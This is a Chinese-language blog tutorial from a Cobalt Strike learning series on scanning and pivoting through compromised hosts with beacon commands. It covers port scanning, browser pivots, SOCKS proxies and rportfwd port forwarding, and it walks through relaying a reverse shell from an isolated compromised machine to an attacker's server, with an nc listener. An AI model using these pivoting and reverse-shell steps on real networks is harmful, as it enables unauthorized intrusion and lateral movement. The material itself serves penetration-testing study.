一、端口扫描
0x01 进行扫描
(1):右键beacon-->Explore-->Port Scan
(2):使用图形化界面进行端口扫描
(3):使用命令进行端口扫描
portscan IP段 445 arp 数据包大小
0x02 查看扫描结果
(1):查看beacon命令行
(2):查看目标视图
二、浏览器代理设置
0x01 设置浏览器代理
(1):右键beacon-->Explore-->Browser Pivot
(2):配置代理端口
(3):配置成功
三、内置SOCKS模块
0x01 设置SOCKS
-
方法一:
(1):右键beacon-->Privoting-->SOCKS Server
(2):设置端口
(3):设置成功
如上图所示,这样就创建好了一个SOCKS代理。
-
方法二
socks port
这样就启动了一个SOCKS代理。
0x02 查看SOCKS代理
(1):View-->Proxy Pivots
(2):SOCKS代理如下
0x03 停止SOCKS代理
(1):停止所有SOCKS代理
socks stop
在对应的beacon中执行如上命令,可以停止该beacon中的所有代理。
(2):停止单个SOCKS代理
View-->Proxy Pivots
0x04 SOCKS代理使用
(1):第一种方法
直接使用浏览器添加一个SOCKS4代理(服务器选择Cobalt Strike团队服务器地址,端口就是上面指定的端口)。
(2):第二种方法
选择一个SOCKS代理,点击Tuunel,将生成的代码复制到Meatasploit控制台中。
(3):第三种方法
使用各种代理工具。在windows中使用SocksCap64等工具,在Linux中使用Proxychains、sSocks等工具。
四、rportfwd模块
0x01 环境介绍
上述三台主机A、B和C,其中A主机是外网主机并且上面搭建了Cobalt Strike的团队服务器,B主机已经被控制并且和团队服务器互通,C主机也被控制但是不通外网,和团队服务器不通。因此可以在B主机上使用rportfwd来进行端口转发。
0x02 端口转发
rportfwd [bind port] [forwad host] [forward port]
rportfwd stop [bind port]
如果正向连接指定端口,可以使用端口转发来将被控制主机的本地端口转发到公网上,或者转发到团队服务器监听的端口上。在Cobalt Strike上选择一个beacon进入交互式,其中bind port为本机需要转发的本地端口,forward host为VPS或者团队服务器的IP,forward prot为VPS或团队服务器监听的端口。对应上图中,bind port就是主机B的端口,forward host就是1.1.1.1这个IP,forward port是1.1.1.1这个IP监听的端口。
0x03 端口转发实例
(1):在主机A上进行监听
如果主机A是团队服务器,则可以在团队服务器上监听一个端口,如4444端口;如果主机A是VPS,可以使用nc-lvp 4444来监听4444这个端口。
(2):进行端口转发
打开CobaltStrike中的beacon列表,选择192.168.223.1这个beacon,在里面执行如下命令:
rportfwd 1234 1.1.1.1 4444
这个1234端口就是等会生成的反弹shell的监听端口。
(3):生成反弹shell
注意:这块需要生成一个反弹shell,这个反弹shell需要在主机C上执行,反弹shell中的监听IP是主机B的IP(192.168.223.1),监听端口是1234。
整个流程是这样的,在主机C上执行反弹shell,反弹shell的IP是主机B的1234端口,因此将流量反弹到主机B的1234端口,由于rportfwd将主机B的1234端口的流量转发到了主机A的4444端口,因此流量被转发到主机A的4444端口,由于之前在cobalt Strike上监听了主机A的4444端口,因此在Cobalt Strike上得到了主机C的beacon。
原文始发于微信公众号(想走安全的小白):Cobalt Strike系列五----Cobalt Strike端口扫描和浏览器代理
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论